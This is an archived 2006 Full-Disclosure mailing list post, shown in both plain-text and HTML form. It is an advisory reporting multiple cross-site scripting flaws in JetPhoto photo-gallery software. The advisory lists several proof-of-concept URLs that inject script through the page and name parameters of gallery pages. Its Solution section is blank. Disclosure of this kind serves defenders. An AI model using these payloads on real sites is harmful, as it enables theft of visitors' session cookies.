[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] JetPhoto Multiple Cross-Site Scripting
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail ! com>
Date: 2006-04-11 1:52:08
Message-ID: 558f59870604101852r491b1860we3f4d90c9a7caa98 () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
###########################################################################
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendor Url: http://www.jetphotosoft.com
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#
#the affected system causing the robbery of cookie
#
#Example XSS:
##################################################################
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(
document.cookie);</script>
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
#all
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
# original advisorie: http://www.elitemexico.org/11.txt
##################################################################
[Attachment #5 (text/html)]
###########################################################################<br># \
Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie<br># <br># \
<br># Author: 0o_zeus_o0 ( Arturo Z. )<br># Contact: <a \
href="mailto:zeus@diosdelared.com"> zeus@diosdelared.com</a><br># Website: <a \
href="http://www.elitemexico.org">www.elitemexico.org</a><br># Date: 10/04/06<br># \
Risk: Medium<br># Vendor Url: <a \
href="http://www.jetphotosoft.com">http://www.jetphotosoft.com</a> <br># Affected \
Software: JetPhoto<br># Non Affected: \
<br>#<br>#Info:<br>##################################################################<br>#this \
bug consists of inserting script in the line of execution of <br>#<br>#the affected \
system causing the robbery of cookie <br>#<br>#Example XSS: \
<br>##################################################################<br>#<br>#http:/ \
/www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>
<br>#<br>#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Al \
bum&page=<script>alert(document.cookie);</script><br>#<br>#http://www. \
vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script><br>#<br>#http://www.vuln.com/[path]/view/Classic.vie \
w/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</sc \
ript><br>#<br>#http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(
document.cookie);</script><br>#<br>#http://www.vuln.com/[path]/view/Orange.view \
/detail.php?name=1&page=<script>alert(document.cookie);</script><br>#< \
br>#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(
document.cookie);</script><br>#<br>############################################ \
######################<br>#<br>#Solution:<br>##################################################################<br>#<br>#<br>#VULNERABLE \
VERSIONS <br>##################################################################<br>#al \
l<br>#<br>##################################################################<br>#Contact \
information<br>#0o_zeus_o0<br>#zeus@<a href="http://diosdelared.com"> \
diosdelared.com</a><br>#www.elitemexico.org<br>##################################################################<br>#greetz: \
lady fire,Mi beba, olimpus klan team and elitemexico<br># <br># original advisorie: \
<a href="http://www.elitemexico.org/11.txt"> \
http://www.elitemexico.org/11.txt</a><br>##################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic